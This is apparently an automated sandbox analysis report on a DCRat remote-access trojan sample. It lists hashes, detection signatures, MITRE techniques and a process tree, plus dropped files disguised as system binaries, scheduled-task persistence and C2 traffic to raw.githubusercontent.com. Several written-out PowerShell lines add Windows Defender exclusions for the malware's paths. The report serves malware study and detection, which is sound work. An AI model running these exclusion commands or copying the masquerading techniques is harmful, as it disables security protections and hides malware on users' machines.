dcrat | 27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab

Analysis

max time kernel
150s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/12/2024, 04:24 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe
Size

1.3MB
MD5

58fc356ab776b908fd6d702f26a7beee
SHA1

b1643ebb0bb4b7a0fb52a8e17e217146ac5598c9
SHA256

27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab
SHA512

d095da7aabcfc40e2b3c20e1d5c496db26f52bf2b837ba0000ae9e2c459c853371610525078d70dc6b54bcb6c1669cd0fc18cddf1984bdcb98ca6e91ea477e2c
SSDEEP

24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score

10^/10

dcrat discovery execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 60 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2952	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5044	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3308	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4552	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4020	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	556	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3544	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2660	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2880	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4260	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4396	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3404	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1164	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	440	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1728	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3540	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2944	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2532	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3688	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3892	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4704	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	440	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1704	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1852	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4596	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2056	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4952	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3492	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3556	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1048	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	544	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3480	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3100	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4460	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3952	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4244	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4784	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4356	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4988	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	332	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3504	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4032	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	396	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2140	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	1676	schtasks.exe	87
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	1676	schtasks.exe	87

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/files/0x0007000000023cb5-10.dat	dcrat
behavioral2/memory/4100-13-0x00000000004E0000-0x00000000005F0000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3612	powershell.exe
4916	powershell.exe
3892	powershell.exe
1884	powershell.exe
3768	powershell.exe
1060	powershell.exe
4388	powershell.exe
4380	powershell.exe
3688	powershell.exe
3500	powershell.exe
452	powershell.exe
4564	powershell.exe
3164	powershell.exe
3880	powershell.exe
5088	powershell.exe
1444	powershell.exe
4260	powershell.exe
4168	powershell.exe
2532	powershell.exe
4252	powershell.exe
1440	powershell.exe
2944	powershell.exe

Checks computer location settings 2 TTPs 16 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	DllCommonsvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	powershell.exe

Executes dropped EXE 15 IoCs

pid	Process
4100	DllCommonsvc.exe
448	DllCommonsvc.exe
3720	powershell.exe
3944	powershell.exe
4952	powershell.exe
5088	powershell.exe
5004	powershell.exe
3020	powershell.exe
1892	powershell.exe
2212	powershell.exe
2224	powershell.exe
2012	powershell.exe
4372	powershell.exe
1456	powershell.exe
4848	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs

Web Service

T1102

flow	ioc
35	raw.githubusercontent.com
38	raw.githubusercontent.com
39	raw.githubusercontent.com
46	raw.githubusercontent.com
48	raw.githubusercontent.com
49	raw.githubusercontent.com
34	raw.githubusercontent.com
16	raw.githubusercontent.com
21	raw.githubusercontent.com
40	raw.githubusercontent.com
47	raw.githubusercontent.com
50	raw.githubusercontent.com
14	raw.githubusercontent.com

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files\Internet Explorer\56085415360792	DllCommonsvc.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\e978f868350d50	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\StartMenuExperienceHost.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\ee2ad38f3d4382	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\Visualizations\f3b6ecef712a24	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\55b276f4edf653	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\Registry.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Mail\9e8d7a4ca61bd9	DllCommonsvc.exe
File created	C:\Program Files\Internet Explorer\wininit.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Mozilla Maintenance Service\logs\powershell.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\powershell.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files (x86)\Microsoft.NET\6203df4a6bafc7	DllCommonsvc.exe
File created	C:\Program Files (x86)\Windows Multimedia Platform\56085415360792	DllCommonsvc.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\lsass.exe	DllCommonsvc.exe
File created	C:\Program Files\Windows Media Player\Visualizations\spoolsv.exe	DllCommonsvc.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\conhost.exe	DllCommonsvc.exe
File opened for modification	C:\Windows\Tasks\conhost.exe	DllCommonsvc.exe
File created	C:\Windows\Tasks\088424020bedd6	DllCommonsvc.exe
File created	C:\Windows\tracing\OfficeClickToRun.exe	DllCommonsvc.exe
File created	C:\Windows\tracing\e6c9b481da804f	DllCommonsvc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	DllCommonsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 60 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
396	schtasks.exe
2584	schtasks.exe
3372	schtasks.exe
3688	schtasks.exe
440	schtasks.exe
3504	schtasks.exe
1852	schtasks.exe
3952	schtasks.exe
332	schtasks.exe
840	schtasks.exe
3404	schtasks.exe
2140	schtasks.exe
5060	schtasks.exe
4260	schtasks.exe
2656	schtasks.exe
3492	schtasks.exe
2276	schtasks.exe
1704	schtasks.exe
4032	schtasks.exe
3544	schtasks.exe
3892	schtasks.exe
1004	schtasks.exe
4336	schtasks.exe
4552	schtasks.exe
2392	schtasks.exe
4704	schtasks.exe
4988	schtasks.exe
4952	schtasks.exe
4244	schtasks.exe
5044	schtasks.exe
2248	schtasks.exe
3540	schtasks.exe
1520	schtasks.exe
4460	schtasks.exe
3308	schtasks.exe
4020	schtasks.exe
1728	schtasks.exe
4596	schtasks.exe
1048	schtasks.exe
2660	schtasks.exe
2944	schtasks.exe
4320	schtasks.exe
1248	schtasks.exe
2952	schtasks.exe
2880	schtasks.exe
4396	schtasks.exe
3100	schtasks.exe
4356	schtasks.exe
5080	schtasks.exe
3556	schtasks.exe
2056	schtasks.exe
544	schtasks.exe
4784	schtasks.exe
2192	schtasks.exe
1884	schtasks.exe
1164	schtasks.exe
440	schtasks.exe
2532	schtasks.exe
556	schtasks.exe
3480	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
4100	DllCommonsvc.exe
3768	powershell.exe
3768	powershell.exe
4388	powershell.exe
4388	powershell.exe
5088	powershell.exe
5088	powershell.exe
4916	powershell.exe
4916	powershell.exe
4380	powershell.exe
4380	powershell.exe
1060	powershell.exe
1060	powershell.exe
1440	powershell.exe
1440	powershell.exe
3880	powershell.exe
3880	powershell.exe
1444	powershell.exe
1444	powershell.exe
1060	powershell.exe
1444	powershell.exe
4564	powershell.exe
4564	powershell.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
4388	powershell.exe
5088	powershell.exe
3768	powershell.exe
4916	powershell.exe
1440	powershell.exe
3880	powershell.exe
4380	powershell.exe
4564	powershell.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
448	DllCommonsvc.exe
3164	powershell.exe
3164	powershell.exe
3500	powershell.exe
3500	powershell.exe
1884	powershell.exe
1884	powershell.exe
4252	powershell.exe
4252	powershell.exe
2532	powershell.exe
2532	powershell.exe
3612	powershell.exe
3612	powershell.exe
4168	powershell.exe
4168	powershell.exe
4260	powershell.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	4100	DllCommonsvc.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	3880	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	448	DllCommonsvc.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	1884	powershell.exe
Token: SeDebugPrivilege	3500	powershell.exe
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	2532	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	3720	powershell.exe
Token: SeDebugPrivilege	3944	powershell.exe
Token: SeDebugPrivilege	4952	powershell.exe
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	3020	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	1456	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4316 wrote to memory of 4488	4316	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe	83
PID 4316 wrote to memory of 4488	4316	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe	83
PID 4316 wrote to memory of 4488	4316	JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe	83
PID 4488 wrote to memory of 2740	4488	WScript.exe	84
PID 4488 wrote to memory of 2740	4488	WScript.exe	84
PID 4488 wrote to memory of 2740	4488	WScript.exe	84
PID 2740 wrote to memory of 4100	2740	cmd.exe	86
PID 2740 wrote to memory of 4100	2740	cmd.exe	86
PID 4100 wrote to memory of 4564	4100	DllCommonsvc.exe	116
PID 4100 wrote to memory of 4564	4100	DllCommonsvc.exe	116
PID 4100 wrote to memory of 3768	4100	DllCommonsvc.exe	117
PID 4100 wrote to memory of 3768	4100	DllCommonsvc.exe	117
PID 4100 wrote to memory of 1060	4100	DllCommonsvc.exe	118
PID 4100 wrote to memory of 1060	4100	DllCommonsvc.exe	118
PID 4100 wrote to memory of 1440	4100	DllCommonsvc.exe	119
PID 4100 wrote to memory of 1440	4100	DllCommonsvc.exe	119
PID 4100 wrote to memory of 3880	4100	DllCommonsvc.exe	120
PID 4100 wrote to memory of 3880	4100	DllCommonsvc.exe	120
PID 4100 wrote to memory of 5088	4100	DllCommonsvc.exe	121
PID 4100 wrote to memory of 5088	4100	DllCommonsvc.exe	121
PID 4100 wrote to memory of 4916	4100	DllCommonsvc.exe	122
PID 4100 wrote to memory of 4916	4100	DllCommonsvc.exe	122
PID 4100 wrote to memory of 1444	4100	DllCommonsvc.exe	123
PID 4100 wrote to memory of 1444	4100	DllCommonsvc.exe	123
PID 4100 wrote to memory of 4388	4100	DllCommonsvc.exe	124
PID 4100 wrote to memory of 4388	4100	DllCommonsvc.exe	124
PID 4100 wrote to memory of 4380	4100	DllCommonsvc.exe	125
PID 4100 wrote to memory of 4380	4100	DllCommonsvc.exe	125
PID 4100 wrote to memory of 448	4100	DllCommonsvc.exe	135
PID 4100 wrote to memory of 448	4100	DllCommonsvc.exe	135
PID 448 wrote to memory of 4260	448	DllCommonsvc.exe	170
PID 448 wrote to memory of 4260	448	DllCommonsvc.exe	170
PID 448 wrote to memory of 2532	448	DllCommonsvc.exe	171
PID 448 wrote to memory of 2532	448	DllCommonsvc.exe	171
PID 448 wrote to memory of 1884	448	DllCommonsvc.exe	172
PID 448 wrote to memory of 1884	448	DllCommonsvc.exe	172
PID 448 wrote to memory of 3500	448	DllCommonsvc.exe	173
PID 448 wrote to memory of 3500	448	DllCommonsvc.exe	173
PID 448 wrote to memory of 3612	448	DllCommonsvc.exe	174
PID 448 wrote to memory of 3612	448	DllCommonsvc.exe	174
PID 448 wrote to memory of 3688	448	DllCommonsvc.exe	175
PID 448 wrote to memory of 3688	448	DllCommonsvc.exe	175
PID 448 wrote to memory of 4168	448	DllCommonsvc.exe	176
PID 448 wrote to memory of 4168	448	DllCommonsvc.exe	176
PID 448 wrote to memory of 3892	448	DllCommonsvc.exe	177
PID 448 wrote to memory of 3892	448	DllCommonsvc.exe	177
PID 448 wrote to memory of 452	448	DllCommonsvc.exe	178
PID 448 wrote to memory of 452	448	DllCommonsvc.exe	178
PID 448 wrote to memory of 3164	448	DllCommonsvc.exe	179
PID 448 wrote to memory of 3164	448	DllCommonsvc.exe	179
PID 448 wrote to memory of 4252	448	DllCommonsvc.exe	180
PID 448 wrote to memory of 4252	448	DllCommonsvc.exe	180
PID 448 wrote to memory of 2944	448	DllCommonsvc.exe	181
PID 448 wrote to memory of 2944	448	DllCommonsvc.exe	181
PID 448 wrote to memory of 2580	448	DllCommonsvc.exe	194
PID 448 wrote to memory of 2580	448	DllCommonsvc.exe	194
PID 2580 wrote to memory of 1888	2580	cmd.exe	196
PID 2580 wrote to memory of 1888	2580	cmd.exe	196
PID 2580 wrote to memory of 3720	2580	cmd.exe	202
PID 2580 wrote to memory of 3720	2580	cmd.exe	202
PID 3720 wrote to memory of 668	3720	powershell.exe	209
PID 3720 wrote to memory of 668	3720	powershell.exe	209
PID 668 wrote to memory of 4372	668	cmd.exe	211
PID 668 wrote to memory of 4372	668	cmd.exe	211

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_27108950380722927f768c875bf2df17d2f2107aceb4a8db789e9029728561ab.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4316
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2740
  - - C:\providercommon\DllCommonsvc.exe
      "C:\providercommon\DllCommonsvc.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\lsass.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3768
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\StartMenuExperienceHost.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\SearchApp.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\Registry.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3880
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\upfc.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\explorer.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4916
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\Visualizations\spoolsv.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\RuntimeBroker.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4388
